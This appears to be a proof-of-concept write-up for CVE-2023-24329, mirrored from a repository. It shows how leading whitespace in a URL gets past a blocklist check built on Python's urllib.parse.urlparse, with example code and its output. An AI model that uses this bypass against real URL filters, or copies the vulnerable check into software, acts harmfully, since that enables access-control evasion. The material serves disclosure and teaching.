CVE-2023-24329 PoC — Python 输入验证错误漏洞

来源

关联漏洞

Description

Example of CVE-2023-24329 

介绍

# Intro
The URL parsing functions focus on splitting a URL string into its components, or on combining URL components into a URL string.
  - [urllib.parse.urlparse](https://docs.python.org/3/library/urllib.parse.html#url-parsing)

**Simply** `urllib.parse` used for parsing urls, we can bypass it with adding blanks before the url. This happens in python `3.11.4` and before.

# PoC
Let's break down `example.py`

Here is a set of websites that you should not access:
```python
blocked_list = [
    "http://example.com/",
    "http://example2.com/"
]
```

This function checks if website is on blocked list or not, if it's on block list it should return `URL Blocked`

```python
def is_url_blocked(url):
    parse = urllib.parse.urlparse(url).geturl()
    if  parse in blocked_list: return 'URL Blocked'
    else: return 'Bypassed'

```

Now I added two urls and I check if any of them is blocked and cannot be accessed:
```python
payload1 = "    http://example.com/"
payload2 = "http://example.com/"

print(
    is_url_blocked(payload1),
    "\n",
    is_url_blocked(payload2)
)

```

`payload1` is where i bypassed  `is_url_blocked()` because adding long space before the url will bypass `urllib.parse.urlparse(url).geturl()` it would not execute as excpected.
That's why the output is 

```
Bypassed
```
But on `payload2` we get 
```
URL Blocked
```

# Support
If you would like to support me with donation, I recommend you to give it to someone who really need it please. If you do so then consider that i earned your support.

<a href="https://www.buymeacoffee.com/jawadpy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a>

文件快照

 [4.0K]  /data/pocs/36a2d3a2f97e35e4e33191706ed0f2d257edb98c
├── [ 468]  example.py
└── [1.7K]  README.md

0 directories, 2 files

备注